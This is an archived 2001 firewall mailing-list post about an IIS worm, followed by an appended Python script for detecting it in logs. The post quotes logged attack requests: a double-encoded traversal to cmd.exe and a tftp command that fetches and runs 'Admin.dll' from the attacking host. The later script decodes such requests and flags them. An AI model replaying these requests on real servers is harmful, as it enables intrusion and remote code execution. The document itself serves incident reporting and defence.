I haven't been able to get a copy of the worm yet, but
it scans IIS machines for vulnerabilities able to run
cmd.exe?\dir+c, then if that works, sends an attempt
to run tftp back to itself and grab "Admin.dll", then
run it.
Here are some logs:
Tue Sep 18 09:43:13 2001: 38.214.180.8 -> x.x.1.29: 1888 -> 80 GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Tue Sep 18 09:43:20 2001: 38.214.180.8 -> x.x.1.29: 2460 -> 80 GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%2038.214.180.8%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0
Tue Sep 18 09:43:20 2001: 38.214.180.8 -> x.x.1.29: 2500 -> 80 GET /scripts/..%252f../Admin.dll HTTP/1.0
Jim Hutchins
Sandia
----------------------------------------------------------------
James A. Hutchins Phone: 1-925-294-2416
Sandia National Laboratories FAX: 1-925-294-1225
P.O. Box 969, MS9011 EMail: [EMAIL PROTECTED]
Livermore, CA 94551-0969
_______________________________________________
Firewalls mailing list
[EMAIL PROTECTED]
http://lists.gnac.net/mailman/listinfo/firewalls
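The three requests in the post show the pattern a defender would want to flag: a double-percent-encoded traversal (`%252f`, which only becomes `/` after two decoding passes) into `winnt/system32/cmd.exe`, then a `tftp` command fetching `Admin.dll` from the scanning host, then a request for the dropped file. The following detection script is an added example, not part of the original post or any worm sample; it assumes the log line format shown in the post, uses the post's three lines plus one constructed benign request as input, and the indicator names and thresholds are my own choices.

```python
import re
from urllib.parse import unquote

# Sample input: the three lines from the post plus one constructed benign line (last).
SAMPLE_LOG = r"""
Tue Sep 18 09:43:13 2001: 38.214.180.8 -> x.x.1.29: 1888 -> 80 GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Tue Sep 18 09:43:20 2001: 38.214.180.8 -> x.x.1.29: 2460 -> 80 GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%2038.214.180.8%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0
Tue Sep 18 09:43:20 2001: 38.214.180.8 -> x.x.1.29: 2500 -> 80 GET /scripts/..%252f../Admin.dll HTTP/1.0
Tue Sep 18 09:44:01 2001: 10.0.0.5 -> x.x.1.29: 3001 -> 80 GET /index.html HTTP/1.0
"""

# Log format assumed from the post: "<timestamp>: <src> -> <dst>: <sport> -> <dport> <METHOD> <path> HTTP/x.y"
LOG_RE = re.compile(
    r"^(?P<ts>.+?): (?P<src>\S+) -> (?P<dst>\S+): (?P<sport>\d+) -> (?P<dport>\d+) "
    r"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>HTTP/\d\.\d)$"
)

# "tftp -i <host> GET <remote-file> ..." inside a decoded command string
TFTP_RE = re.compile(r"tftp\s+-i\s+(\S+)\s+get\s+(\S+)", re.IGNORECASE)


def fully_decode(path, max_layers=4):
    """Percent-decode until the string stops changing; return (decoded, layers).

    `layers` counts how many decoding passes actually changed the input, so a
    request that only becomes a traversal after the second pass reports 2.
    """
    layers = 0
    while layers < max_layers:
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
        layers += 1
    return path, layers


def classify(raw_path):
    """Return (decoded_path, layers, indicators) for one request path."""
    decoded, layers = fully_decode(raw_path)
    low = decoded.lower()
    url_part = low.split("?", 1)[0]      # path without the query/command string
    indicators = []
    if layers >= 2:
        indicators.append("double-encoding")
    if "../" in low or "..\\" in low:
        indicators.append("traversal")
    if "cmd.exe" in low:
        indicators.append("cmd.exe")
    if re.search(r"\btftp\b", low):
        indicators.append("tftp-fetch")
    if url_part.endswith("/admin.dll"):
        indicators.append("admin.dll-request")
    return decoded, layers, indicators


def tftp_source(decoded_path):
    """Extract (host, file) the request tries to pull via tftp, if any."""
    m = TFTP_RE.search(decoded_path)
    return (m.group(1), m.group(2)) if m else None


def scan_log(text):
    """Parse log text and return a finding dict for every suspicious request."""
    findings = []
    for line in text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                      # unparsable line: skip, do not guess
        decoded, layers, indicators = classify(m["path"])
        if indicators:
            findings.append({
                "src": m["src"],
                "dst": m["dst"],
                "dport": int(m["dport"]),
                "path": decoded,
                "layers": layers,
                "indicators": indicators,
                "tftp": tftp_source(decoded),
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['src']} -> {f['dst']}:{f['dport']} layers={f['layers']} "
              f"{','.join(f['indicators'])} {f['path']}")
```

The decoding loop is the important part: a signature that only decodes once sees `..%2f..`, not `../..`, and misses the traversal, while the decoded command string gives you the host the payload is fetched from, which is the address to block at the firewall and to search for in other logs.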